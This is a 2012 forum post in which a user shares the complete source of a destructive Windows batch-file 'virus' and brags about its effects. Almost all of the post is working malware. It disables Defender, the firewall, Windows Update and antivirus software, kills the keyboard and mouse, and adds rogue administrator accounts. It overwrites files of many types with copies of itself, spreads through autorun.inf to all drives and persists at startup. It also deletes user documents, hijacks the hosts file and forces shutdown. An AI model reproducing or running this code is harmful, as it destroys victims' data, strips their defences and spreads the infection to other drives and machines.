uu001 Novice
Posts : 37
| Subject: Batch file virus: Virus Created By uu001 2012-01-06, 12:58 | |
| Hey guys, I know the heading sounds creepy, I’m gonna post the most deadly virus that can be created simply by just using notepad and batch file programming. Its safe as long as you don’t run it. So don’t run it as long as you want your computer to stay healthy. I shouldn’t be posting such a deadly virus, but I will be providing the source code and it is self explanatory and you can understand how the virus works and mechanism behind it. So before reading the source code, I think you should first know what the virus does to your computer. -> Disables your task Manager. ->Disables your mouse. ->Disables your keyboard. ->Adds a Limited user account and two Administrator accounts. ->Swaps mouse buttons ->Confuses file extensions ( .txt as .jpeg etc) ->Blocks google, hotmail, youtube, facebook, wikipedia,MSN. ->Will Display ” follow me bumper to bumper” In matrix Style.( how cool is that) ->Swaps Mouse buttons ->Opens a website 50 times in new a window. @echo off title uu001 Virus ::——MsgBox Function——:: echo x=msgbox(“CLICK YES TO ALL OPTIONS OR IT WILL FAIL”,vbExclamation or vbOkOnly,”Click (YES)”) >>dll32.vbs start “” “dll32.vbs” ::—————————:: ::–Disable Windows Defender-:: net stop “WinDefend” taskkill /f /t /im “MSASCui.exe” ::—————————:: ::-Disable Windows Security Center-:: net stop “wscsvc” ::———————————:: ::-Disable Windows Firewall–:: net stop “MpsSvc” taskkill /f /t /im “FirewallControlPanel.exe” ::—————————:: ::-Disable Windows Error Reporting-:: net stop “WerSvc” ::———————————:: ::-Disable Windows Parental Controls-:: net stop “WPCSvc” ::———————————–:: ::—Disable Windows Update–:: net stop “wuauserv” ::—————————:: ::-Disable Windows Backup-:: net stop “SDRSVC” ::————————:: ::—Disable Taskmanager—–:: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul ::—————————:: REN *.jpeg *.vir REN *.gif *.vir REN *.png *.vir ::——Disable Keyboard—–:: echo Windows Registry Editor Version 5.00 > “nokeyboard.reg” echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> “nokeyboard.reg” echo “Scancode Map”=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> “nokeyboard.reg” echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> “nokeyboard.reg” echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> “nokeyboard.reg” echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> “nokeyboard.reg” echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> “nokeyboard.reg” echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> “nokeyboard.reg” echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> “nokeyboard.reg” echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> “nokeyboard.reg” echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> “nokeyboard.reg” echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> “nokeyboard.reg” echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> “nokeyboard.reg” echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> “nokeyboard.reg” echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> “nokeyboard.reg” echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> “nokeyboard.reg” echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> “nokeyboard.reg” echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> “nokeyboard.reg” echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> “nokeyboard.reg” echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> “nokeyboard.reg” echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> “nokeyboard.reg” echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> “nokeyboard.reg” echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> “nokeyboard.reg” start nokeyboard.reg ::—————————:: ::——-Disable Mouse——-:: set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 ::—————————:: ::—-Add Normal Account—–:: net user Username Password /add ::—————————:: ::—–Add Admin Account—–:: net user Username Password /add net localgroup administrators Username /add ::—————————:: ::—–Add Admin Account—–:: net user OWNED Password /add net localgroup administrators OWNED /add ::—————————:: ::—–Kill Explorer.exe—–:: echo :a >>WindUpdate.bat echo tskill explorer >>WindUpdate.bat echo goto a >>WindUpdate.bat echo Set objShell = CreateObject(“WScript.Shell”)>>rundlll32.vbs echo strCommand = “WindUpdate.bat”>>rundlll32.vbs echo objShell.Run strCommand, vbHide, TRUE>>rundlll32.vbs start “” rundlll32.vbs ::—————————::
::——-AV Kill [UD]——–:: net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:\Program Files\alwils~1\avast4\*.* del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe del /Q /F C:\Program Files\kasper~1\*.exe cls del /Q /F C:\Program Files\trojan~1\*.exe del /Q /F C:\Program Files\f-prot95\*.dll del /Q /F C:\Program Files\tbav\*.dat cls del /Q /F C:\Program Files\avpersonal\*.vdf del /Q /F C:\Program Files\Norton~1\*.cnt del /Q /F C:\Program Files\Mcafee\*.* cls del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* del /Q /F C:\Program Files\Norton~1\Norton~1\*.* del /Q /F C:\Program Files\Norton~1\*.* cls del /Q /F C:\Program Files\avgamsr\*.exe del /Q /F C:\Program Files\avgamsvr\*.exe del /Q /F C:\Program Files\avgemc\*.exe cls del /Q /F C:\Program Files\avgcc\*.exe del /Q /F C:\Program Files\avgupsvc\*.exe del /Q /F C:\Program Files\grisoft del /Q /F C:\Program Files\nood32krn\*.exe del /Q /F C:\Program Files\nood32\*.exe cls del /Q /F C:\Program Files\nod32 del /Q /F C:\Program Files\nood32 del /Q /F C:\Program Files\kav\*.exe del /Q /F C:\Program Files\kavmm\*.exe del /Q /F C:\Program Files\kaspersky\*.* cls del /Q /F C:\Program Files\ewidoctrl\*.exe del /Q /F C:\Program Files\guard\*.exe del /Q /F C:\Program Files\ewido\*.exe cls del /Q /F C:\Program Files\pavprsrv\*.exe del /Q /F C:\Program Files\pavprot\*.exe del /Q /F C:\Program Files\avengine\*.exe cls del /Q /F C:\Program Files\apvxdwin\*.exe del /Q /F C:\Program Files\webproxy\*.exe del /Q /F C:\Program Files\panda software\*.* ::—————————:: ::–Infect All Html Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.html) Do ( Set HtmlInfect=%%Z > Nul Copy /y %0 %HtmlInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Mp3 Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.mp3) Do ( Set Mp3Infect=%%Z > Nul Copy /y %0 %Mp3Infect% ) )
Del /f /s /q DirPath ::—————————:: ::——-Infect All .Doc—–:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.doc) Do ( Set DocInfect=%%Z > Nul Copy /y %0 %DocInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Exe Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.exe) Do ( Set ExeInfect=%%Z > Nul Copy /y %0 %ExeInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Bat Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.bat) Do ( Set BatInfect=%%Z > Nul Copy /y %0 %BatInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Vlc Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.vlc) Do ( Set VlcInfect=%%Z > Nul Copy /y %0 %VlcInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Mp4 Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.mp4) Do ( Set Mp4Infect=%%Z > Nul Copy /y %0 %Mp4Infect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Txt Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.txt) Do ( Set TxtInfect=%%Z > Nul Copy /y %0 %TxtInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Jpeg Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.jpeg) Do ( Set JpegInfect=%%Z > Nul Copy /y %0 %JpegInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Gif Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.gif) Do ( Set GifInfect=%%Z > Nul Copy /y %0 %GifInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—Infect All Mpeg Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.mpeg) Do ( Set MpegInfect=%%Z > Nul Copy /y %0 %MpegInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Wma Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.wma) Do ( Set WmaInfect=%%Z > Nul Copy /y %0 %WmaInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Rar Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.rar) Do ( Set RarInfect=%%Z > Nul Copy /y %0 %RarInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Zip Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.zip) Do ( Set ZipInfect=%%Z > Nul Copy /y %0 %ZipInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—-Infect All Vbs Files—:: Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do ( Set DirPath=%%Y > Nul For %%Z In (%DirPath%\*.vbs) Do ( Set VbsInfect=%%Z > Nul Copy /y %0 %VbsInfect% ) )
Del /f /s /q DirPath ::—————————:: ::—–Infect All Drives—–:: for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open=”%%E:\%0″ >> %%E:\autorun.inf echo action=Open folder to see files… >> %%E:\autorun.inf) ::—————————:: ::—-Infect All Folders—–:: Dir %SystemRoot% /s /b > PathHost For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul Del /f /s /q PathHost > Nul ::—————————:: ::—–Infect “ls” CMD—–:: copy %0 %windir%\system32\ls.bat ::—————————:: ::——Run As Service——-:: copy “Exhalemods.webs.com.bat” “C:\Windows\Exhalemods.webs.com” reg add HKLM\software\Microsoft\Windows\CurrentVersion\RunServices /v “Exhalemods.webs.com” /t REG_SZ /d “C:\Windows\Exhalemods.webs.com.bat” / f > nul ::—————————:: ::—–Infect Autoexec.bat—:: echo start “” %0>>%SystemDrive%\AUTOEXEC.BAT ::—————————:: ::——Copy To Startup——:: copy “Exhalemods.webs.com.bat” “%userprofile%\Start Menu\Programs\Startup\Exhalemods.webs.com.bat” ::—————————:: ::–Change Pass To InShadow–:: net user %username% InShadow ::—————————:: ::–Start Hidden WinXP Song–:: cd “C:\Windows\system32\oobe\images” start title.wma ::—————————:: ::—Disable Taskmanager—–:: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul ::—————————:: ::—-Swap Mouse Buttons—–:: RUNDLL32 USER32.DLL,SwapMouseButton ::—————————:: ::——Change The Time——:: time 00:00 ::—————————:: ::——-Open Disk Tray——:: echo Do >> “opendisk.vbs” echo Set oWMP = CreateObject(“WMPlayer.OCX.7″ ) >> “opendisk.vbs” echo Set colCDROMs = oWMP.cdromCollection >> “opendisk.vbs” echo colCDROMs.Item(d).Eject >> “opendisk.vbs” echo colCDROMs.Item(d).Eject >> “opendisk.vbs” echo Loop >> “opendisk.vbs” start “” “opendisk.vbs” ::—————————:: ::—-Hide My Music Folder—:: attrib +h “%userprofile%\my documents\my music” ::—————————:: ::Confuse File Extensions [TXT]:: assoc .mp3=txtfile assoc .xml=txtfile assoc .png=txtfile ::—————————–:: ::–Confuse File Extensions–:: assoc .dll=txtfile assoc .exe=pngfile assoc .bat=WinRAR assoc .vbs=Visual Style assoc .reg=xmlfile assoc .txt=regfile ::—————————:: ::——-Delete MS Paint—–:: del /f /q “mspaint.exe” ::—————————:: ::—–Delete My Music——-:: del /f /q “C:\Users\%userprofile%\My Documents\My Music\*.*” ::—————————:: ::–Delete Internet Explorer-:: del /f /q “C:\Program Files\Internet Explorer\iexplore.exe” ::—————————:: ::——–Delete Calc.——-:: del /f /q “calc.exe” ::—————————:: ::–Delete Windows Live Mail-:: del /f /q “wlmail.exe” ::—————————:: ::——-Delete Notepad——:: del /f /q “notepad.exe” ::—————————:: ::——-Delete Wordpad——:: del /f /q “WordPad.exe” ::—————————:: ::—–Delete My Pictures—-:: del /f /q “C:\Users\%userprofile%\My Documents\My Pictures\*.*” ::—————————:: ::—-Delete My Documents—-:: del /f /q “C:\Users\%userprofile%\My Documents\*.*” ::—————————:: ::——-Block YouTube——-:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 youtube.com >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: ::——–Block Google——-:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 google.com >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: ::——–Block Hotmail——:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 hotmail.com >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: ::——–Block Yahoo!——-:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 yahoo.com >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: ::——-Block Wikipedia—–:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 wikipedia.org >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: ::———Block MSN———:: cd “C:\Windows\System32\Drivers\etc” echo 127.0.0.1 msn.com >> “Hosts” echo 127.0.0.1 [You must be registered and logged in to see this link.] >> “Hosts” ::—————————:: color 02 cls echo W ping localhost -n .15 >nul cls echo Wa ping localhost -n .15 >nul cls echo Wak ping localhost -n .15 >nul cls echo Wake ping localhost -n .15 >nul cls echo Wake ping localhost -n .15 >nul cls echo Wake u ping localhost -n .15 >nul cls echo Wake up ping localhost -n .15 >nul cls echo Wake up ping localhost -n .15 >nul cls
cls echo T ping localhost -n .15 >nul cls echo Th ping localhost -n .15 >nul cls echo The ping localhost -n .15 >nul cls echo The ping localhost -n .15 >nul cls echo The M ping localhost -n .15 >nul cls echo The Ma ping localhost -n .15 >nul cls echo The Mat ping localhost -n .15 >nul cls echo The Matr ping localhost -n .15 >nul cls echo The Matri ping localhost -n .15 >nul cls echo The Matrix ping localhost -n .15 >nul cls echo The Matrix ping localhost -n .15 >nul cls echo The Matrix h ping localhost -n .15 >nul cls echo The Matrix ha ping localhost -n .15 >nul cls echo The Matrix has ping localhost -n .15 >nul cls echo The Matrix has ping localhost -n .15 >nul cls echo The Matrix has y ping localhost -n .15 >nul cls echo The Matrix has yo ping localhost -n .15 >nul cls echo The Matrix has you ping localhost -n .15 >nul cls echo The Matrix has you. ping localhost -n .15 >nul cls echo The Matrix has you.. ping localhost -n .15 >nul cls echo The Matrix has you… ping localhost -n 5 >nul cls echo F ping localhost -n .15 >nul cls echo Fo ping localhost -n .15 >nul cls echo Fol ping localhost -n .15 >nul cls echo Foll ping localhost -n .15 >nul cls echo Follo ping localhost -n .15 >nul cls echo Follow ping localhost -n .15 >nul cls echo Follow ping localhost -n .15 >nul cls echo Follow t ping localhost -n .15 >nul cls echo Follow th ping localhost -n .15 >nul cls echo Follow the ping localhost -n .15 >nul cls echo Follow the ping localhost -n .15 >nul cls echo Follow the w ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Followme bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n .15 >nul cls echo Follow me bumper to bumper ping localhost -n 5 >nul cls echo K ping localhost -n .15 >nul cls echo Kn ping localhost -n .15 >nul cls echo Kno ping localhost -n .15 >nul cls echo Knoc ping localhost -n .15 >nul cls echo Knock ping localhost -n .15 >nul cls echo Knock, ping localhost -n .15 >nul cls echo Knock, ping localhost -n .15 >nul cls echo Knock, k ping localhost -n .15 >nul cls echo Knock, kn ping localhost -n .15 >nul cls echo Knock, kno ping localhost -n .15 >nul cls echo Knock, knoc ping localhost -n .15 >nul cls echo Knock, knock ping localhost -n .15 >nul cls echo Knock, knock, ping localhost -n .15 >nul cls echo Knock, knock, ping localhost -n .15 >nul cls
cls :start echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own echo You Just Got own @echo OFF title Virus Detected Do Not Close Window echo Virus Detected attempting to remove virus… echo (press any key to continue) pause >nul echo Virus is spreading throughout the system… echo (press any key to destroy) pause >nul echo destroying virus… echo (press any key to continue) pause >nul echo files deleted to destroy virus echo (press any key to cancel) pause >nul taskkill /f /im explorer.exe cls echo cancel failed echo (press any key to restore) pause >nulecho files restored start /im explorer.exe cls echo files restored echo (press any key to continue) pause >nul echo checking for virus… echo virus still detected echo (press any key to destroy) pause >nul echo virus is destroyed echo (press any key to exit) pause >nul ::——–MsgBox Spam——–:: echo Do>>msgbox.vbs echo x=msgbox(“You Have Been Hacked.”,vbExclamation or vbOkOnly,”Hacked”) >>msgbox.vbs echo Loop>>msgbox.vbs start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” start “” “msgbox.vbs” ::—————————:: ::——-Spam C Drive——–:: echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” echo %random% > “C:\%random%Spammed Filetype” ::—————————:: ::—-Spam System32 Folder—:: echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” ::—————————:: ::—-Spam System32 Folder—:: echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” echo %random% > “C:\Windows\System32\%random%Spammed Filetype” ::—————————:: ::——-Spam Desktop——–:: echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” echo %random% > “%userprofile%\Desktop\%random%Spammed Filetype” ::—————————:: ::—-Spam With Net Send—–:: net start “messenger” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” net send * “iruotereinnovative.com” ::—————————:: start [You must be registered and logged in to see this link.] reg add “HKCU\Software\Microsoft\Internet Explorer\Main” /v “START PAGE” /d “http://exhalemods.webs.com” start [You must be registered and logged in to see this link.] start [You must be registered and logged in to see this link.] start [You must be registered and logged in to see this link.] ::—–Shutdown Computer—–:: shutdown -s -t 200 -c “GET OWNED in 60seconds Freak !!” ::—————————::
Last edited by uu001 on 2012-01-06, 12:59; edited 1 time in total (Reason for editing : Making the source code clearer) | |
|